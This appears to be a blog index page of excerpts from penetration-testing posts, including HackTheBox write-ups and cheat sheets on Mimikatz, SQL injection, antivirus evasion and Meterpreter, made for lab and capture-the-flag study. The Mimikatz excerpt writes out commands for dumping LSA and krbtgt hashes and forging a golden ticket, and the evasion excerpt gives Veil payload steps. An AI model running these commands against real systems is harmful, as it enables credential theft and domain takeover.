Table of Contents Command History Set Up Recon Nmap Smbclient Gpp-decrypt Foothold GetUserSPNs.py JohnTheRipper Psexec.py Final Words What is Kerberos? How Does It Work? Mitigations References Command History Nmap – found open ports, pretty much confirmed that this is an AD DC – effective – valuable smbclient – found share folders – effective – valuable…
Author: 0pr
Mimikatz
Table of Contents Dump LSA Hashes Dump krbtgt Hash Golden Ticket Dump LSA Hashes lsadump::lsa /patch Dump krbtgt Hash lsadump::lsa /inject /name:krbtgt Golden Ticket kerberos::golden /User:<username> /domain:<domain> /sid:<user-sid> /krbtgt:<krbtgt-NTLM-hash> /id:500 /ptt # if successful misc::cmd # list another user's files dir \\<computer-name>\<drive>$
0x0F-HackTheBox-Control
Table of Contents Command History Set Up Recon Masscan Nmap Check out the Website Gobuster The Login Page Burp Suite SQL Injection Probe Sqlmap Side Notes: How Sqlmap Works Foothold MySQL Database WinPEAs Sqlmap Dump All Info Powershell Code Execution PHP File Solution Final Thoughts References Command History masscan – found several service ports -…
0x0E-HackTheBox-OpenAdmin
Table of Contents Command History Set Up Recon Masscan Check Out Website Gobuster Manual Explore Foothold Manual Enumeration MySQL Linenum LinPEAs Go Back and Review SSH Brute Force JohnTheRipper Final Thoughts References Command History masscan – found open port 22, 80 – effective nmap – scan for services – effective gobuster – found three hidden…
Tricks
Table of Contents General Linux Metasploit Port Forwarding Sed Less SSH SSH Tunnel Bash NetCat Nmap Wget PHP File Upload Script and Web Server Tcpdump Windows Burp Suite General Put GIF8; at the top of the payload to make it look like a GIF image file type. Linux Metasploit Import XML into the database. nmap -Pn -sS -A -oX Subnet1…
Databases
Table of Contents MySQL Enumeration Manual SQL Injection Sqlmap Foothold Sqlmap Mysqldump MSSQL Enumeration Mssql_ping Mssql_enum Mssql_enum_logins Mssql_schemadump Brute Forcing Mssql_login Jtr_mssql_fast Foothold Mssqlclient.py Mssql_payload Lateral Movement Mssql_hashdump XP_cmdshell Privilege Escalation Mssql_escalate_dbowner Mssql_escalate_execute_as MySQL Enumeration Manual SQL Injection If a search field is vulnerable to injection, use the techniques below # in Burp Suite check the…
Active Directory 101 – LDAP
Basically speaking, LDAP is a network protocol that can be used to talk to Active Directory. On Windows Server, LDAP is integrated as a feature alongside AD, adding authentication/authorization scalability to the entire system. It is too big a topic to cover here. Here are some good references to read about…
0x0D-HackTheBox-Cascade
Table of Contents Command History Set Up Recon Masscan Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Samba on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.ps1 Go Back to Check the Command List Crack the LDAP Encoded Thing Evil-winrm Some Assessment Final Thoughts References Command History Reference…
Avoiding Detection
Table of Contents Msfvenom Packer Veil References Msfvenom Link to Msfvenom. Use it with multiple encoders to evade detection. Packer Install upx to pack the executable. Here is a link to the PolyPack Project, which talks about packing in more detail. Veil For the MeterHTTPSContained payload ./Veil.py use 20 set LHOST <ip> set LPORT <port> generate use the…
Meterpreter
Table of Contents Extracting the Password Hashes Pass the Hash Capturing Key Strokes Token Impersonation Pivoting Through Sub-network Meterpreter Scripts Migrating to a Process Killing Antivirus Software Obtaining System Password Hashes Viewing All Traffic on a Target Machine Scraping a System Using Persistence Leveraging Post Exploitation Modules Upgrading Your Command Shell to Meterpreter Manipulating Windows…